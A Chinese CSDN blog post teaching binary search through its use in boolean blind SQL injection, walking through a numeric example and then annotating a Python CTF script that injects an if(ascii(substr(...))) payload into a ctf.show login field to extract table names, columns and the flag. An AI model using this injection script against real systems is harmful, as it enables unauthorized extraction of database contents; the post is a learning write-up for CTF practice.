二分法学习

最新推荐文章于 2022-11-07 21:47:01 发布
最新推荐文章于 2022-11-07 21:47:01 发布
阅读量572 收藏
点赞数 1
分类专栏: sql-lab 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Reme_mber/article/details/123559000
版权

文章目录

前言

文章同步于我的个人博客https://quan9i.top/twofen/,欢迎大家访问。
由于学习sql注入时看了部分师傅的脚本,涉及到二分法,才发现自己对二分法的所知甚少,因此来对二分法进行学习,希望能对正在学习二分法的人有所帮助。

定义

​ 二分法(Bisection method),即一分为二的的方法。对于在区间[a,b]上连续不断且满足f(a)*f(b)<0
的函数y=f(x),通过不断地把函数f(x)的零点所在区间二等分,使区间两个端点逐步逼近零点,进而得到
零点的近似值的方法。

小白理解,设置极小值与极大值,然后不断缩小范围,最终确定答案

详细过程

以下是小白个人见解(有误还请各位师傅多多指教)
二分法讲解(赋值讲解)
设置极大值100和极小值1(这两个值不可能是要求的那个,在在这里假设所求值为56)
然后取出平均值50
第一次比较
将平均值与所求值进行比较,50<56,发现平均值比所求值要小,说明所求值介于55到100之间,
第二次比较
此时我们就把极小值更改为51(本来应改为50,但不可能是50),取出平均值75,将所求值与平均值进行比较,75>56,发现平均值比所求值大,说明平均值介于51到75之间
第三次比较
此时更改极大值为75,取出平均值63,将所求值与平均值进行比较,63>56,发现平均值比所求值大,说明平均值介于55到63之间
第四次比较
此时更改极大值为63,取出平均值57,将所求值与平均值进行比较,57>56,发现平均值比所求值大,说明平均值介于55到57之间
第五次比较
此时更改极大值为57,取出平均值56,将所求值与平均值进行比较,56=56,两者相等,结束。

示例

这里以Y4师傅的一个布尔盲注脚本为例进行讲解

# @Author:Y4tacker
import requests

url = "http://c6172bf8-f8db-4b40-aba1-2fcd58ca0604.challenge.ctf.show/api/"

result = ""
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查字段
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # 查flag
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {
            'username': f"admin' and if(ascii(substr(({payload}),{i},1))>{mid},1,2)='1",
            'password': '1'
        }
        
        r = requests.post(url,data=data)
        if "密码错误"  == r.json()['msg']:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

mid = (head + tail) >> 1可以理解为(head+tail)/2,这个算法比除2更快,更准确。(效果相同)

admin' and if(ascii(substr(({payload}),{i},1))>{mid},1,2)='1",

这里是取出了一个字符的ascii码,与后面的mid进行比较
这个if "密码错误" == r.json()['msg']:可以理解为执行正确,执行正确则说明二分法中所求值大于平均值,那此时要干什么呢,当然是把极小值设置成平均值再+1(因为不可能是平均值),也就是代码中的head = mid + 1,那如果执行错误的话呢,就说明二分法所求值小于平均值,说明所求值的范围是(head,mid),那此时我们就可以把极大值设置为mid,也就是代码中的tail = mid

while head < tail:

此时看while循环,它执行的条件是head<tail,那只有当head=tail时候(没有head>tail是因为这种情况无法实现)它才会往下执行,当head=tail的时候,这时候就确定出了flag的某个字母的ascii码值,我们输出也就得到了flag的一部分,获取flag的代码如下图

 if head != 32:
        result += chr(head)

那可能有人就要问了,flag最多也就几十个字母,获取完flag了,这个脚本是不是还在执行呢,会不会一直循环呢,答案是不会,看这个代码

 else:
        break

当有flag时会获取flag字母,到后面无flag,它就会直接停止,此时循环也就随之结束。脚本执行完毕
具体执行结果
在这里插入图片描述

quan9i
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入详解
m0_67392811的博客
06-12 5770
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
CTFSHOW WEB入门 命令执行 web29-48
sinat_41572027的博客
07-09 1808
CTFSHOW WEB入门 命令执行 web29-48
PTA 7-2 求与平均值最接近的数
m0_56680402的博客
09-24 796
撰写一个程序,从标准输入装置读取一串整数,然后求取这串整数里与平均值 差值绝对值最小的数并将其与平均值输出至屏幕。 程序运行时,先读入一个整数n说明后面要跟的一串整数的个数。再依次输入 n个整数。 输入格式: 5 1 7 9 51 20 输出格式: min:20 avg:17.6 输入样例: 在这里给出一组输入。例如: 5 1 7 9 51 20 输出样例: 在这里给出相应的输出。例如: min:20 avg:17.6 代码实现(C++) #include <iostre
输入五个整数,找出与平均值最接近的数并输出(数组解决)
wdnmd1234567的博客
11-07 1169
在几个整数中,找出与平均值最接近的数
[SQL盲注][极客大挑战 2019]FinalSQL(二分法)
Y4tacker的博客
08-16 6119
发现过滤了一堆比如*空格之类的我们用()绕过上脚本, 网站太垃圾了请求的快,就要出错,还要加一个sleep等一下 import time import requests url = "http://34e5371d-f910-48da-ae2e-26ed2b56eb8d.node3.buuoj.cn/search.php?id=" result = '' i = 0 while True: i = i + 1 head = 32 tail = 127 while h
政治与行政二分法学习教案.pptx
11-23
政治与行政二分法学习教案.pptx
mat_二分法_
10-03
二分法,又称折半搜索法,是一种在数学和计算机科学中广泛使用的寻找方程根或在有序数组中查找特定元素的算法。该方法利用了函数的单调...理解并掌握二分法不仅有助于解决数学问题,也是学习数值计算和算法分析的基础。
二分法解方程
03-19
在提供的资源“二分法解方程”中,可能包含了具体的算法实现示例和案例分析,通过学习这些内容,你可以更深入地理解二分法的工作原理,并能够运用到实际编程项目中,解决类似问题。无论是理论研究还是实际开发,掌握...
erfenfa.rar_二分法
09-23
二分法,又称折半搜索或二进制搜索,是一种在有序数组中查找特定元素的...在给定的"二分法"文件中,可能包含了关于二分法的详细解释、实例代码或者相关习题,对学习者而言,这些资源无疑能加深对二分法的理解和应用。
clkdiv.zip_二分法
09-20
通过阅读和理解这个文件,我们可以学习如何用VHDL实现二分法分频器,并了解如何在实际FPGA或ASIC设计中应用这一技术。 总之,这个VHDL实现的二分法时钟分频器是一个有效的数字系统设计实例,展示了硬件描述语言的...
SQL注入之-盲注
走在成功路上的博客
11-24 1187
SQL注入之-盲注前言盲注流程 前言 Tips: 后续根据本人认知体系不断壮大会持续更新 QAQ 首先了解几个需要的函数: 1. A = SBUSTR(str,pos); 2. B = LENGTH() 3. C = IF(expr1,expr2,expr3) 4. D = SLEEP(time) A 作用: 就是从pos开始的位置,一直截取到最后。 B 作用: 用于获取对应字段的字符长度。...
二分法查找
Zach的博客
08-04 2万+
如何用最省内存的方式实现快速查找功能 二分法思想 二分法查找针对的是一个有序的数据集合,每次通过与区间的中间元素对比,将待查找的区间缩小为之前的一半,直到找到要查找的元素,或者区间被缩小为0 二分查找非常高效,假设数据大小是n,每次查找后数据都会缩小为原来的一半,也就是会除以2,最坏情况下,直到查找区间被缩小为空,才停止 当n/2k = 1时,k是总共缩小的次数,而每一次缩小操作...
SQL注入详解
weixin_30284355的博客
10-03 162
本文将从5个方面叙述SQL注入的一些问题,漏洞原理,测试,利用,危害,修复。接着介绍一些SQL注入的技巧东西。SQL注入一般被分为5种类型,基于布尔的盲注,基于时间的盲注,基于报错的注入,联合查询注入,堆查询注入。 类型描述基于布尔盲注即可以根据返回页面判断条件真假的注入基于时间盲注不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。基...
【java】1011. 在 D 天内送达包裹的能力---学会二分查找,快速遍历!!!
惠菁
04-26 154
传送带上的包裹必须在 D 天内从一个港口运送到另一个港口。 传送带上的第 i 个包裹的重量为 weights[i]。每一天,我们都会按给出重量的顺序往传送带上装载包裹。我们装载的重量不会超过船的最大运载重量。 返回能在 D 天内将传送带上的所有包裹送达的船的最低运载能力。 示例 1: 输入:weights = [1,2,3,4,5,6,7,8,9,10], D = 5 输出:15 解释: 船舶最低载重 15 就能够在 5 天内送达所有包裹,如下所示: 第 1 天:1, 2, 3, 4,
二分法简单排序和查找
weixin_34302561的博客
03-27 239
    二分法排序算法思想简单描述: 在插入第i个元素时,对前面的0~i-1元素进行折半,先跟他们 中间的那个元素比,如果小,则对前半再进行折半,否则对后半 进行折半,直到left&gt;right,然后再把第i个元素前1位与目标位置之间 的所有元素后移,再把第i个元素放在目标位置上。 直接看代码。 public static void DichotomySort(int[] array...
算法---二分法
热门推荐
jacob_007的专栏
09-21 2万+
二分法可以归为两大类: * 二分查找算法 * 二分排序算法 * 二分合并算法二分查找算法算法中经常用到二分查找算法,比如最常规的应用就是在一个有序数组中找特定的数,但是如何写出一个完整准确的二分法呢,边界条件如何判断,到底是等于还是不等?可能会困恼大家,比如说查找第一个等于5的数,那又在如何查找呢?查找最后一个等于5的数,又该如何改变? 这里有一个公式,可以解决所有这类的问题,它分为四步走:
scratch二分法
最新发布
04-13
Scratch是一种图形化编程语言,用于教育和初学者学习编程。二分法是一种常用的搜索算法,用于在有序列表中查找目标元素。在Scratch中,可以使用二分法来实现对列表的搜索。 在Scratch中,可以通过以下步骤来实现...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值